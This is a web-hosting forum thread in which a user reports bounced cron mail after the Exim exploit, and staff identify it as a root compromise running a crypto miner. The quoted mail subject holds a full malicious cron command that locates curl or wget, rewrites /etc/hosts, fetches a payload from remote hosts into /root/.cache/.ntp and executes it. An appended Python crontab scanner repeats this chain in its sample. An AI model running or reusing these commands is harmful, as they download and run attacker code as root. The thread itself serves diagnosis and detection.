Mail delivery failed: returning message to sender
Hi.
I upgraded my cPanel after the Exim exploit and ever since then I have been getting emails in the queue that contain the following.
How can I fix this? I am getting mails every 2 minutes.
--1561246082-eximdsn-632408078
Content-type: text/plain; charset=us-ascii
This message was created automatically by mail delivery software.
A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:
root@server.example.com
root cannot accept local mail deliveries
--1561246082-eximdsn-632408078
Content-type: message/delivery-status
Reporting-MTA: dns; server.example.com
Action: failed
Final-Recipient: rfc822;root@server.example.com
Status: 5.0.0
--1561246082-eximdsn-632408078
Content-type: text/rfc822-headers
Return-path:
Received: from root by mega.example.com with local (Exim 4.92)
(envelope-from )
id 1hepQP-00074l-Uw
for root@server.example.com; Sat, 22 Jun 2019 23:28:02 +0000
From: root@server.example.com (Cron Daemon)
To: root@server.example.com
Subject: Cron tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to " && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.net/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.org/src/ldm -o /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.net/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.org/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
Content-Type: text/plain; charset=ANSI_X3.4-1968
Auto-Submitted: auto-generated
X-Cron-Env:
X-Cron-Env:
X-Cron-Env:
X-Cron-Env:
X-Cron-Env:
Message-Id:
Date: Sat, 22 Jun 2019 23:28:01 +0000
X-Exim-DSN-Information: Due to administrative limits only headers are returned
--1561246082-eximdsn-632408078--
It looks to me like your hostname is not an FQDN. Go to WHM and reset your hostname. This is a common problem with OpenVZ VMs, which I'd bet is what you have. Only your host can fix the issue with the changing hostname every time you boot.
Checking Google for just a snip of your post: /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/
...and I found this link. Worth looking at this closer I think. "In short, your server has been hacked and hackers are running a crypto miner on it. This is bad."
I've edited your post above to remove the URLs in it. They were very similar to the URLs mentioned at that link. If you're unsure what to do here, you might want to look into hiring someone that can help you with this.
1. The error here:
root@server.example.com
root cannot accept local mail deliveries
indicates that you've not set the address for root's mail to be forwarded to in WHM >> Server Contacts >> Edit System Mail Preferences.
2. And by far the most important: that cron output is associated with the Exim compromise. If you'd like for us to investigate to identify if your server is root compromised we would be happy to. I also want to point out that there is no safe way to clean a root level compromise; if it is found that you have been affected (which I am almost certain you have) you will need to migrate. We also offer migrations for this. If you'd like cPanel's support to assist you can open a ticket using the link in my signature. Once open please reply with the Ticket ID here so that we can update this thread with the resolution once the ticket is resolved. Thanks!
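As an added example (not from the thread or from cPanel), a small Python checker that scans crontab text for the behaviours of the cron job quoted in the original post: a fetch whose output file is made executable and run by a shell in the same command line, a dot-file under /root/.cache, an /etc/hosts overwrite, and TLS verification disabled on the download. The sample crontab and its dropper.invalid URL are constructed placeholders, not values from the thread.

```python
import re
from typing import Dict, List

# Heuristics distilled from the cron job quoted in the thread; each pattern names one
# behaviour of that job.  Added example code, not cPanel's or the thread's.
INDICATORS = [
    # fetch to a file, chmod +x the same file, then hand it to a shell, all in one command
    ("download_then_exec", re.compile(
        r"(?:\$\{?(?:curl|wget)\}?|\bcurl\b|\bwget\b)[^;&|]*?\s-[oO]\s*(?P<out>[^\s|;&)]+)"
        r".*?chmod \+x (?P=out).*?(?:/bin/sh|\bsh\b|\bbash\b)\s+(?P=out)")),
    # dot-file dropper hidden under /root/.cache (the job above writes /root/.cache/.ntp)
    ("hidden_dropper_path", re.compile(r"/root/\.cache/\.[^\s|;&)]+")),
    # /etc/hosts overwritten, which removes entries that could block the download hosts
    ("etc_hosts_rewrite", re.compile(r"\becho\b[^;|&]*>\s*/etc/hosts")),
    # TLS verification disabled on the fetch (curl -k, wget --no-check-certificate)
    ("tls_verify_disabled",
     re.compile(r"--no-check-certificate|\bcurl\b[^;|&]*\s-[A-Za-z]*k\b")),
]

# Constructed sample crontab; dropper.invalid is a placeholder, not the URL from the thread.
SAMPLE_CRONTAB = r"""
# cPanel nightly update
0 3 * * * /usr/local/cpanel/scripts/upcp --cron
*/2 * * * * if [ $(cat /etc/hosts|grep -i "onion.\|tor2web"|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --connect-timeout 26 https://dropper.invalid/src/ldm -o /root/.cache/.ntp||wget --quiet --no-check-certificate https://dropper.invalid/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
"""


def scan_crontab(text: str) -> List[Dict[str, object]]:
    """Return one finding per non-comment crontab line that trips any indicator."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        hits = [name for name, rx in INDICATORS if rx.search(line)]
        if hits:
            findings.append({"line": lineno, "indicators": hits, "command": stripped[:72]})
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {', '.join(f['indicators'])}")
```

Feed it the output of `crontab -l` for each user plus the files under /etc/cron.d; a hit confirms the root-level compromise described in the reply above rather than something to fix by deleting the line.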